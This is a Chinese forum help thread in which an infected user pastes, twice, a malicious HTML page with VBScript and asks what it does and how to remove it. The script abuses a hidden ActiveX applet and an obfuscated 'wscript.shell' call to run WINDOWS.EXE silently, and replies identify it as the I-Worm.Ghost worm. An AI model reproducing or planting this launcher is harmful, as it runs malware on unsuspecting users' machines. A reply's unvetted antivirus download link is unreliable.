求助我中毒了。能看懂这段VB代码什么意思么.怎么杀毒.现在没个文件夹下都有一个和文件名一样的EXE文件 ( 积分: 100 )

Z

zhdong

Unregistered / Unconfirmed
GUEST, unregistred user!
<html>
<head>
<meta http-equiv="content-type" content="text/html;
charset=UTF-8">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid = "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100%;
height: 100%" tabIndex=-1>
</object>
</body>
</html>
<script language=vbscript>
document.write "<div style='position:absolute;
left:0px;
top:0px;
width:0px;
height:0px;
z-index:28;
visibility: hidden'><APPLET NAME=L HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<script language=vbscript>
On Error Resume Next
Dim path
Path = ""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)+"/"
Set AppleObject =do
cument.applets("l")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
sd="w"+"sshe"+"ll"
Set sd = AppleObject.GetObject()
sd.run(Path + "WINDOWS.EXE")
</script>
 
<html>
<head>
<meta http-equiv="content-type" content="text/html;
charset=UTF-8">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid = "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100%;
height: 100%" tabIndex=-1>
</object>
</body>
</html>
<script language=vbscript>
document.write "<div style='position:absolute;
left:0px;
top:0px;
width:0px;
height:0px;
z-index:28;
visibility: hidden'><APPLET NAME=L HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<script language=vbscript>
On Error Resume Next
Dim path
Path = ""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)+"/"
Set AppleObject =do
cument.applets("l")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
sd="w"+"sshe"+"ll"
Set sd = AppleObject.GetObject()
sd.run(Path + "WINDOWS.EXE")
</script>
 
哇,樓主,你最好把這段話加上{  },我一打開就被Nav發現了!!!
 
这是网页的applets的恶意程序,你只要有防毒软件,就没什么事的
 
I-Worm.Ghost病毒,
我上午刚刚杀完我机器上的,在网上下在瑞星2005然后运行安装程序,安装程序会先杀内存中的病毒,安装完成最后一个界面中选择运行杀毒程序,然后选择所有硬盘,你就可以先去干别的了,我刚刚搞定的,肯定没问题。
我的下在连接
http://www.7057.com/down/7057下載站%20歡%20迎%20下載ww.7057.com.php.asp?id=7165&no=1
 
基本上很多的查毒杀毒软件最近更新了病毒库并开了病毒防火墙的都能查杀这个破东东。
 
我靠,打开这个页面就报病毒,楼主你莫害偶啊
 
这段代码大部分vb程序代码都是求得路径的算法嘛,至于重要部分什么sd.run(Path + "WINDOWS.EXE")云云好像和vb无关吧,应该是运行通过控件感染的记算机上的程序,先查查注册表和系统服务
 
顶部